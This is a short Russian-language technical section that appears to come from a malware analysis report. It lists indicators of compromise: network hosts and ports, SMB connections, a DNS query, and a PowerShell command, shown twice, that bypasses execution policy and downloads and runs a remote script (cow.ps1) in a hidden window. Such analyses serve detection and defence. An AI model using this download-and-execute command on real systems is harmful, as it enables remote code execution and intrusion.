Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec bypass IEX(IWR http://17#.##7.91.249:8080/cow.ps1 -UseBasicParsing)
- 'ta#####t.ertelekom.ru':8081
- '17#.#57.91.249':8080
- '19#.#8.119.159':445
- '19#.#8.119.159':139
- DNS ASK ta#####t.ertelekom.ru
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec bypass IEX(IWR http://17#.##7.91.249:8080/cow.ps1 -UseBasicParsing)' (со скрытым окном)